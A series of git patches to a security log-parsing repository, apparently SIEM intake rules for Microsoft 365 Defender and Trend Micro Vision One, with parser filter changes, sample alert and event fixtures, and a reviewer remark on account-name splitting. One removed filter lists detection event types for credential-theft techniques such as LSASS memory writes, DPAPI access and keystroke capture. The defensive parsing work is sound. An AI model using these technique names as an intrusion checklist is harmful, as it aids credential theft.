"{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + 
"DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "2633942188", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "test.fr", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@test.fr" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<20241028141819.43623347A8F@test.fr>", + "subject": "EMAIL Subject", + "to": { + "address": [ + "alan.smithee@test.fr" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file From 94649a4b22251fe173eb508355223e3f8e67a851 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 12:16:03 +0100 Subject: [PATCH 69/84] Enhanced smart descriptions --- .../_meta/smart-descriptions.json | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 6232e66f8..2d1728daa 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json @@ -9,6 +9,17 @@ { "field": "action.type" } ] }, + { + "value": "New {action.type} incident received: {microsoft.defender.investigation.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" }, + { "field": "microsoft.defender.investigation.name" } + ] + }, { "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}", "conditions": [ 
From 1bb05b973e9cb21fae745b7ce6eabd0f184a55eb Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 13:55:16 +0100 Subject: [PATCH 70/84] Deleted device_events exceptions --- .../microsoft-365-defender/ingest/parser.yml | 4 +- ...test_device_event_sensitive_file_read.json | 81 +++++++++---------- .../tests/test_device_events_2.json | 11 ++- ..._device_events_shell_link_create_file.json | 74 +++++++++-------- .../tests/test_device_process_created.json | 8 +- .../test_devices_events_script_content.json | 11 ++- 6 files changed, 91 insertions(+), 98 deletions(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index f60d9b6f0..0a33f577f 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -41,9 +41,9 @@ pipeline: output_field: "data" - name: set_common_fields - name: set_process_events - filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + filter: '{{json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}' - name: set_process_deviceprocess_events - filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", 
"exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}' - name: set_alert_evidence_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}' - name: set_alert_info_fields diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json index fedd99aea..413d002c1 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json 
@@ -24,18 +24,16 @@ "properties": { "AccountSid": "S-1-2-3", "process": { - "parent": { - "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", - "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", - "FileSize": 3316224, - "LogonId": "5223047", - "VersionInfoCompanyName": "Test Corporation", - "VersionInfoFileDescription": "Browser EXE", - "VersionInfoInternalFileName": "Browser.EXE", - "VersionInfoOriginalFileName": "Browser.EXE", - "VersionInfoProductName": "Test Product", - "VersionInfoProductVersion": "1, 0, 0, 1" - } + "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "FileSize": 3316224, + "LogonId": "5223047", + "VersionInfoCompanyName": "Test Corporation", + "VersionInfoFileDescription": "Browser EXE", + "VersionInfoInternalFileName": "Browser.EXE", + "VersionInfoOriginalFileName": "Browser.EXE", + "VersionInfoProductName": "Test Product", + "VersionInfoProductVersion": "1, 0, 0, 1" } }, "type": "SensitiveFileRead" 
@@ -57,37 +55,38 @@ } }, "process": { - "name": "FileName.mdb", + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", "parent": { - "args": [ - "/DBMode", - "/Network", - "/ProjectID", - "/Ticket", - "0", - "0", - "12345678-1234-5678-9012-345678901234", - "123456789" - ], - "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", - "executable": "c:\\program files (x86)\\browser.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" - }, - "name": "browser.exe", - "pid": 1328, - "start": "2024-11-12T10:17:23.990532Z", - "user": { - "domain": "company", - "email": "USERNAME@COMPANY.COM", - "id": "S-1-2-3", - "name": "username" - }, - "working_directory": "c:\\program files (x86)" + "name": "Windows.exe", + "pid": 1820, + "start": "2024-10-14T05:47:54.324381Z" + }, + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" }, - "working_directory": "C:" + "working_directory": "c:\\program files (x86)" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json index 494baa569..4964dae1f 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json 
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json @@ -17,9 +17,7 @@ "action": { "properties": { "process": { - "parent": { - "LogonId": "0" - } + "LogonId": "0" } }, "type": "ScriptContent" @@ -42,9 +40,10 @@ }, "process": { "parent": { - "pid": 417271, - "start": "2024-10-22T15:09:08.624070Z" - } + "pid": 0 + }, + "pid": 417271, + "start": "2024-10-22T15:09:08.624070Z" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json index 37a646715..48696c644 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json @@ -23,18 +23,16 @@ "action": { "properties": { "process": { - "parent": { - "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", - "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", - "FileSize": 1621656, - "LogonId": "8066492", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Word", - "VersionInfoInternalFileName": "WinWord", - "VersionInfoOriginalFileName": "WinWord.exe", - "VersionInfoProductName": "Microsoft Office", - "VersionInfoProductVersion": "16.0.17928.20216" - } + "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "FileSize": 1621656, + "LogonId": "8066492", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Word", + "VersionInfoInternalFileName": "WinWord", + "VersionInfoOriginalFileName": "WinWord.exe", + "VersionInfoProductName": "Microsoft Office", + "VersionInfoProductVersion": "16.0.17928.20216" } }, "type": "ShellLinkCreateFileEvent" 
@@ -60,34 +58,34 @@ } }, "process": { - "name": "FILENAME.LNK", + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", "parent": { - "args": [ - "\"\"", - "\"I:\\COMPANY\\Service\\FILE.doc\"", - "/n", - "/o" - ], - "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", - "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" - }, - "name": "winword.exe", - "pid": 20948, - "start": "2024-11-12T10:02:28.777910Z", - "user": { - "domain": "company", - "email": "JOHNDOE@COMPANY.COM", - "id": "S-1-2-3", - "name": "jdoe" - }, - "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + "name": "explorer.exe", + "pid": 14616, + "start": "2024-11-12T08:47:41.952077Z" + }, + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" }, - "start": "2024-11-06T16:05:23.113802Z", - "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office" + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json index 7acf31f01..cd2ca7981 100644 
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json @@ -29,11 +29,9 @@ } }, "process": { - "parent": { - "user": { - "domain": "autorite nt", - "name": "syst\u00e8me" - } + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" } } } diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json index 72f93da4e..c632ebbfa 100644 --- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json +++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json @@ -17,9 +17,7 @@ "action": { "properties": { "process": { - "parent": { - "LogonId": "0" - } + "LogonId": "0" } }, "type": "ScriptContent" @@ -42,9 +40,10 @@ }, "process": { "parent": { - "pid": 423638, - "start": "2024-10-22T15:09:47.165481Z" - } + "pid": 0 + }, + "pid": 423638, + "start": "2024-10-22T15:09:47.165481Z" }, "related": { "hash": [ From 3c5af0dd65f309e8d14b9d0a538745160ca82713 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Mon, 25 Nov 2024 12:09:53 +0200 Subject: [PATCH 71/84] Fixes and improvements --- .../trend-micro-vision-one/_meta/manifest.yml | 2 +- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 10 ++++++++-- .../tests/test_internal_network_scanner.json | 8 +++----- .../trend-micro-vision-one/tests/test_process.json | 12 ++++++++---- .../trend-micro-vision-one/tests/test_registry.json | 12 +++++++----- 5 files changed, 27 insertions(+), 17 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml index 8363b7b96..da8360194 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml 
@@ -1,7 +1,7 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 -name: Trend Micro Vision One +name: Trend Micro Vision One [BETA] slug: trend-micro-vision-one description: >- diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index a13ee54b2..3446a59f6 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -25,8 +25,6 @@ stages: - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" - organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" - organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}" host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" @@ -39,6 +37,14 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" + - set: + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + + - set: + user.name: "{{final.user.id.split('\\\\')[0]}}" + user.domain: "{{final.user.id.split('\\\\')[1]}}" + filter: "{{final.user.id != null}}" + - set: process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" 
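Review bot: `user.name: "{{final.user.id.split('\\\\')[0]}}"` and `user.domain: "{{final.user.id.split('\\\\')[1]}}"` assume the account entity is always in `DOMAIN\user` form; an `entityValue` without a backslash makes `[1]` raise an index error (presumably aborting the stage), and the `| first`/`| last` variant in the PATCH 72 hunk of the same file instead silently writes the whole value into both `user.name` and `user.domain`. The `filter: "{{final.user.id != null}}"` only guards the missing-entity case; extending it to `filter: "{{final.user.id != null and '\\\\' in final.user.id}}"` keeps both variants safe for UPN-style or bare account names. Whether Vision One ever emits such account entities is not something the fixtures show (test_internal_network_scanner.json only has `john\\doe`), so treat this as a defensive check. Dropping `organization.*` is a fair correction, since the account entity is a user principal rather than an organization.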
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index e6bcf0088..769477b65 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json 
@@ -3,7 +3,7 @@ "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": 
\"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], 
\"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" }, "expected": { - "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", 
\"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": 
